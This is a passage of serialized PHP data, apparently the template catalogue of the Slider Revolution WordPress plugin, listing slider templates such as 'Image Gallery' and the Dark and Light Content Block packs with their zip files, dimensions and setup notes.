class=\"ttm_space\"></span>\r\n\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:62;a:22:{s:2:\"id\";s:2:\"63\";s:5:\"title\";s:13:\"Image Gallery\";s:5:\"alias\";s:12:\"imagegallery\";s:3:\"zip\";s:16:\"imagegallery.zip\";s:3:\"uid\";s:32:\"cef1d75357df2cb53b990c74a214813e\";s:3:\"img\";s:23:\"imagegallery/slide1.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/wordpress-photo-gallery-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:3:\"667\";s:11:\"description\";s:239:\"<span class=\"ttm_content\">A photo gallery suitable to display your images using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:63;a:22:{s:2:\"id\";s:2:\"64\";s:5:\"title\";s:19:\"Standard WP Gallery\";s:5:\"alias\";s:19:\"standard-wp-gallery\";s:3:\"zip\";s:23:\"standard-wp-gallery.zip\";s:3:\"uid\";s:32:\"632035b8a27652d8081dbdfa343dc93d\";s:3:\"img\";s:30:\"standard-wp-gallery/slide1.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/wordpress-photo-gallery-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:3:\"667\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A photo gallery that uses the \"Standard WP Gallery\" add-on to display images.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:407:\"<span class=\"ttm_content\">Please follow the setup guide on the \"Standard WP Gallery\" add-on page.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";s:166:\"[{\"path\":\"revslider-gallery-addon\\/revslider-gallery-addon.php\",\"name\":\"WP Gallery AddOn\",\"url\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-photo-gallery-plugin\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:64;a:22:{s:2:\"id\";s:2:\"65\";s:5:\"title\";s:21:\"Clean News Post Based\";s:5:\"alias\";s:21:\"clean-news-post-based\";s:3:\"zip\";s:25:\"clean-news-post-based.zip\";s:3:\"uid\";s:32:\"f4cf5bbe51afa5a361754bb081cbabf2\";s:3:\"img\";s:32:\"clean-news-post-based/slide1.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-news-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:125:\"<span class=\"ttm_content\"> This slider is automatically populated by WordPress posts.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:423:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Post-Based Slider\"</a>. Make sure to select the post type you want to display in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:65;a:22:{s:2:\"id\";s:2:\"66\";s:5:\"title\";s:22:\"Interactive Whiteboard\";s:5:\"alias\";s:21:\"interactivewhiteboard\";s:3:\"zip\";s:25:\"interactivewhiteboard.zip\";s:3:\"uid\";s:32:\"058b4af535d6c6c7bcec5225845e3eb4\";s:3:\"img\";s:32:\"interactivewhiteboard/slide1.jpg\";s:7:\"preview\";s:77:\"http://revolution.themepunch.com/interactive-whiteboard-animation-free-addon/\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:269:\"<span class=\"ttm_content\">This is the example slider from the Whiteboard add-on preview.<br/><a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used to achieve certain effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:541:\"<span class=\"ttm_content\">This slider template requires the <a href=\"https://www.themepunch.com/slider-revolution/whiteboard-addon/\" target=\"_blank\">Whiteboard add-on</a> to be installed. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:185:\"[{\"path\":\"revslider-whiteboard-addon\\/revslider-whiteboard-addon.php\",\"name\":\"Whiteboard AddOn\",\"url\":\"http:\\/\\/revolution.themepunch.com\\/interactive-whiteboard-animation-free-addon\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:66;a:22:{s:2:\"id\";s:2:\"68\";s:5:\"title\";s:17:\"Innovation Slider\";s:5:\"alias\";s:10:\"innovation\";s:3:\"zip\";s:14:\"innovation.zip\";s:3:\"uid\";s:32:\"d3440b69126d9c186fddc713b18b0002\";s:3:\"img\";s:21:\"innovation/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/best-wordpress-slider-plugin-2016/\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"required\";s:7:\"5.2.3.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:258:\"<span class=\"ttm_content\">A full-screen slider with an elegant fade-out parallax effect. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:493:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images, videos and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-03-29 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:67;a:25:{s:2:\"id\";s:2:\"69\";s:5:\"title\";s:25:\"Dark Content Block - Menu\";s:5:\"alias\";s:24:\"dark-fullsite-block-menu\";s:3:\"zip\";s:34:\"packs/dark-fullsite-block-menu.zip\";s:3:\"uid\";s:32:\"bf4bd226719d3c3d3146592976e31ca1\";s:3:\"img\";s:35:\"dark-fullsite-block-menu/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:68;a:25:{s:2:\"id\";s:2:\"70\";s:5:\"title\";s:25:\"Dark Content Block - Hero\";s:5:\"alias\";s:21:\"dark-fullsite-block-1\";s:3:\"zip\";s:31:\"packs/dark-fullsite-block-1.zip\";s:3:\"uid\";s:32:\"d8859245fe600288ca932dc29aca751f\";s:3:\"img\";s:32:\"dark-fullsite-block-1/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:69;a:25:{s:2:\"id\";s:2:\"71\";s:5:\"title\";s:26:\"Dark Content Block - About\";s:5:\"alias\";s:27:\"dark-fullsite-block-2-about\";s:3:\"zip\";s:37:\"packs/dark-fullsite-block-2-about.zip\";s:3:\"uid\";s:32:\"298401901521a197a8294c1b4f73df3e\";s:3:\"img\";s:38:\"dark-fullsite-block-2-about/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:70;a:25:{s:2:\"id\";s:2:\"72\";s:5:\"title\";s:29:\"Dark Content Block - Services\";s:5:\"alias\";s:30:\"dark-fullsite-block-3-services\";s:3:\"zip\";s:40:\"packs/dark-fullsite-block-3-services.zip\";s:3:\"uid\";s:32:\"8da3ed605472ed6a26c745fb52f85f82\";s:3:\"img\";s:41:\"dark-fullsite-block-3-services/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:71;a:25:{s:2:\"id\";s:2:\"73\";s:5:\"title\";s:29:\"Dark Content Block - Products\";s:5:\"alias\";s:30:\"dark-fullsite-block-4-products\";s:3:\"zip\";s:40:\"packs/dark-fullsite-block-4-products.zip\";s:3:\"uid\";s:32:\"99e4f40399d20261a6131043d0e50b0c\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:422:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\r\n\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:72;a:25:{s:2:\"id\";s:2:\"74\";s:5:\"title\";s:33:\"Dark Content Block - Testimonials\";s:5:\"alias\";s:34:\"dark-fullsite-block-5-testimonials\";s:3:\"zip\";s:44:\"packs/dark-fullsite-block-5-testimonials.zip\";s:3:\"uid\";s:32:\"2f9121e0eedd51afe85e233d0743acab\";s:3:\"img\";s:45:\"dark-fullsite-block-5-testimonials/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:73;a:25:{s:2:\"id\";s:2:\"75\";s:5:\"title\";s:28:\"Dark Content Block - Callout\";s:5:\"alias\";s:29:\"dark-fullsite-block-6-callout\";s:3:\"zip\";s:39:\"packs/dark-fullsite-block-6-callout.zip\";s:3:\"uid\";s:32:\"55fbecb113ff21f050be7adc08637329\";s:3:\"img\";s:40:\"dark-fullsite-block-6-callout/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:74;a:25:{s:2:\"id\";s:2:\"76\";s:5:\"title\";s:27:\"Dark Content Block - Footer\";s:5:\"alias\";s:28:\"dark-fullsite-block-7-footer\";s:3:\"zip\";s:38:\"packs/dark-fullsite-block-7-footer.zip\";s:3:\"uid\";s:32:\"2ff517f5c7c54e3e0c2dd733cfd3400e\";s:3:\"img\";s:39:\"dark-fullsite-block-7-footer/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:75;a:25:{s:2:\"id\";s:2:\"77\";s:5:\"title\";s:26:\"Light Content Block - Menu\";s:5:\"alias\";s:19:\"fullsite-block-menu\";s:3:\"zip\";s:29:\"packs/fullsite-block-menu.zip\";s:3:\"uid\";s:32:\"8010971f34387d5f94a1f4e577ef382a\";s:3:\"img\";s:30:\"fullsite-block-menu/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:76;a:25:{s:2:\"id\";s:2:\"78\";s:5:\"title\";s:26:\"Light Content Block - Hero\";s:5:\"alias\";s:15:\"fullsite-block1\";s:3:\"zip\";s:25:\"packs/fullsite-block1.zip\";s:3:\"uid\";s:32:\"45bf7179843e01ce112e8ec754b0455c\";s:3:\"img\";s:26:\"fullsite-block1/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:77;a:25:{s:2:\"id\";s:2:\"79\";s:5:\"title\";s:27:\"Light Content Block - About\";s:5:\"alias\";s:22:\"fullsite-block-2-about\";s:3:\"zip\";s:32:\"packs/fullsite-block-2-about.zip\";s:3:\"uid\";s:32:\"8402b460638a746d36433cb161440b7d\";s:3:\"img\";s:33:\"fullsite-block-2-about/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:78;a:25:{s:2:\"id\";s:2:\"80\";s:5:\"title\";s:30:\"Light Content Block - Services\";s:5:\"alias\";s:25:\"fullsite-block-3-services\";s:3:\"zip\";s:35:\"packs/fullsite-block-3-services.zip\";s:3:\"uid\";s:32:\"7b8cea27f4d6ae17c5e1eae12457bd06\";s:3:\"img\";s:36:\"fullsite-block-3-services/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:79;a:25:{s:2:\"id\";s:2:\"81\";s:5:\"title\";s:30:\"Light Content Block - 